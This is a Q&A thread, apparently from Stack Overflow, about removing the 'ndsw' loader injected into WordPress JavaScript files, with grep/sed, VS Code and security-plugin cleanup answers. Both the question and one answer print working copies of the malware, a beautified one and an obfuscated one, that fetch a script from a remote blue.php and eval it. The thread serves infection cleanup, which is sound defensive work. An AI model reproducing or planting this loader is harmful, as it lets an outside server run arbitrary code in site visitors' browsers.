Shakil Hossain

Reputation: 1743

Every JS file in my WordPress themes and plugins has this script added to it. How can I remove it?

    // Injected loader, beautified. This first copy looks like a partial paste: the
    // `if (ndsw === undefined) {` opener and the HttpClient/token helpers it calls are
    // not part of this fragment (the complete copy follows further down the page).
    (function() {
    // Bracket-string property access (a['userAgent'] etc.) is how the obfuscator writes
    // ordinary member access. e, g and h (screen, user agent, platform) are assigned
    // but never used in this snippet.
    var a = navigator,
        b = document,
        e = screen,
        f = window,
        g = a['userAgent'],
        h = a['platform'],
        i = b['cookie'],
        j = f['location']['hostname'],
        k = f['location']['protocol'],
        l = b['referrer'];
    // Gate: only proceed when there is a referrer, the referrer does not contain this
    // site's hostname, and document.cookie is empty. A visitor who already holds any
    // cookie for the site (e.g. a logged-in admin) or who navigates within the site
    // therefore never triggers the request.
    if (l && !p(l, j) && !i) {
        // o = <page protocol>//<remote host>/.../blue.php?id=<random token>
        var m = new HttpClient(),
            o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
        m['get'](o, function(r) {
            // The response body is passed to window.eval, but only if it contains the
            // marker 'ndsx'. What actually runs is whatever the remote server returns;
            // that payload is not shown on this page.
            p(r, 'ndsx') && f['eval'](r);
        });
    }

    // p(r, v): true when string r contains substring v (-0x1 is -1).
    function p(r, v) {
        return r['indexOf'](v) !== -0x1;
    }
}());
};;
// Complete injected loader (beautified). Indicators visible in this sample: the global
// flag `ndsw`, the response marker 'ndsx', and a request to .../blue.php?id=<token>.
// `var ndsw` is hoisted, so the test below does not throw on first run; once the flag
// is set to true, further copies of this snippet on the same page skip the body
// (presumably because many files carry the same injection).
if (ndsw === undefined) {
    var ndsw = true,
        // Minimal XMLHttpRequest wrapper: get(url, callback).
        HttpClient = function() {
            this['get'] = function(a, b) {
                var c = new XMLHttpRequest();
                c['onreadystatechange'] = function() {
                    // readyState 4 (0x4) with HTTP status 200 (0xc8): hand the body to the callback.
                    if (c['readyState'] == 0x4 && c['status'] == 0xc8) b(c['responseText']);
                // `!![]` evaluates to true, i.e. an asynchronous GET.
                }, c['open']('GET', a, !![]), c['send'](null);
            };
        },
        // Random base-36 (0x24) string taken from Math.random(), with the leading "0." cut off.
        rand = function() {
            return Math['random']()['toString'](0x24)['substr'](0x2);
        },
        // Two random strings concatenated; used as the `id` query value below.
        token = function() {
            return rand() + rand();
        };
    (function() {
        // e, g and h (screen, user agent, platform) are assigned but never used here.
        var a = navigator,
            b = document,
            e = screen,
            f = window,
            g = a['userAgent'],
            h = a['platform'],
            i = b['cookie'],
            j = f['location']['hostname'],
            k = f['location']['protocol'],
            l = b['referrer'];
        // Gate: a referrer exists, it does not contain this site's hostname, and
        // document.cookie is empty. Visitors with any cookie for the site, or arriving
        // without an external referrer, never trigger the request.
        if (l && !p(l, j) && !i) {
            // o = <page protocol>//<remote host>/.../blue.php?id=<random token>
            var m = new HttpClient(),
                o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
            m['get'](o, function(r) {
                // The response is evaluated with window.eval only when it contains
                // 'ndsx'; the code that runs is decided by the remote server and is not
                // visible in this sample.
                p(r, 'ndsx') && f['eval'](r);
            });
        }

        // p(r, v): true when string r contains substring v (-0x1 is -1).
        function p(r, v) {
            return r['indexOf'](v) !== -0x1;
        }
    }());
};

It only shows up in the browser; when I check the original files, they look fine.

Upvotes: 3

Views: 5522

Answers (3)

Vijay Lathiya

Reputation: 1227

Using grep and sed over SSH: search for the pattern of the infected code and replace it with nothing.

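# Run from the WordPress document root, after taking a file backup that is stored
# outside the web root.
# 1) Review which files will be touched before changing anything:
#      grep -rlF ';if(ndsw' .
# 2) Strip the injected tail. -F matches the marker literally, -Z / -0 keep file names
#    containing spaces or newlines intact, and -r skips sed when nothing matched.
# Note: the sed expression deletes from ';if(ndsw' to the end of that line, so anything
# legitimate that follows the marker on the same line is removed as well.
grep -rlFZ ';if(ndsw' . | xargs -0 -r sed -i 's/;if(ndsw.*//g'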

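Connect to your website folder over SSH and run this command. Every injected script starting with `;if(ndsw` will be removed. This only strips the injected code; it does not deal with whatever wrote it into the files, so the files can be re-infected until that is found and removed as well.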

Upvotes: 1

Youssef Elmoumen

Reputation: 553

According to www.virustotal.com this is a malicious script (JS:Trojan.JS.Agent.UJY); I used Visual Studio Code to delete it.
The one you shared is actually the beautified version; in the infected files it is minified like this:

// Minified, string-table-obfuscated form of the same loader, as the answer author found
// it in infected files. V() returns an array of string fragments ('eval', 'refer'+'rer',
// 'cooki'+'e', '?id=', 'ndsx', ...); g(i) returns element i - 0x6b of that array; the
// first IIFE rotates the array (push/shift) until a parseInt-based sum equals 0x301f5,
// after which the remaining code matches the beautified sample in the question.
// NOTE(review): '//website.domain/...' looks like a placeholder put in place of the real
// host by the answer author; confirm against your own infected files.
// NOTE(review): identifiers, array order and constants may differ between infections, so
// an exact-match search for this whole line can miss variants; the grep-based answer on
// this page keys on the `;if(ndsw` prefix instead.
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//website.domain/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

To remove it:
  • Install Visual studio code
  • Install Remote - SSH extension on VSCode
  • Connect to your server
  • Go to the settings (JSON) and add this line "search.maxResults": 500, if your server specifications or internet speed are low.

Then search for the minified form of this script and replace all occurrences with nothing.
Finally, remove the file wp-admin/css/colors/blue/blue.php

Upvotes: 3

ehab

Reputation: 129

I would suggest that you take a backup of both your files and your database, then install a security plugin like Wordfence. Security plugins compare your current files with the original files from their original sources. If there are any changes, Wordfence will highlight them for you and give you the ability to repair the changed files by reverting them to their original state.

Upvotes: 0
